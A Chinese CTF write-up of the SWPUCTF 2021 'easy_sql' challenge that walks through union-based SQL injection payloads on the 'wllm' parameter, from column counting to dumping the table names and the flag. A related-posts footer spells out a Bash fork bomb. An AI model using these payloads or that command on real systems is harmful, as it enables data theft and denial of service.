[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析

查看网页

有提示,参数是wllm,并且要我们输入点东西

所以,我们尝试以get方式传入

有回显,但似乎没啥用

从上图看应该是字符型漏洞,单引号字符注入

先查看字段数

复制代码
/?wllm=2'order by 3--+

没回显

报错了,说明字段数是3

然后查看回显点

复制代码
/?wllm=2'union select 1,2,3--+

注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。

然后查看数据库名称

复制代码
/?wllm=2'union select 1,2,database()--+

得到数据库名称就可以按顺序数据库-表-列来找flag了

复制代码
/?wllm=2'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
复制代码
?wllm=2'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
复制代码
/?wllm=2'union select 1,2,flag from test_tb--+
相关推荐
20242817李臻2 分钟前
李臻20242817_安全文件传输系统项目报告_第12周
数据库·安全
玉笥寻珍35 分钟前
医疗信息系统安全防护体系的深度构建与理论实践融合
安全·web安全·安全威胁分析·健康医疗
IvanCodes1 小时前
MySQL 数据库备份与还原
大数据·数据库·sql·mysql
Think Spatial 空间思维2 小时前
【SSL部署与优化】HTTP/2与HTTPS的协同效应
安全·http·https·部署·ssl·优化
vortex52 小时前
Bash fork 炸弹 —— :(){ :|:& };:
运维·服务器·开发语言·网络安全·bash
xmweisi022 小时前
【Linux】ssh命令 – 安全的远程连接服务
linux·安全·ssh
2401_837088503 小时前
SQL性能分析
数据库·sql
瓜皮弟子头很铁3 小时前
多项目共用SQL 添加需要字段
数据库·sql
冰茶_3 小时前
掌握LINQ:查询语法与方法语法全解析
sql·学习·microsoft·微软·c#·linq
AORO_BEIDOU4 小时前
遨游科普:三防平板是什么?有什么功能?
网络·5g·安全·智能手机·电脑·信息与通信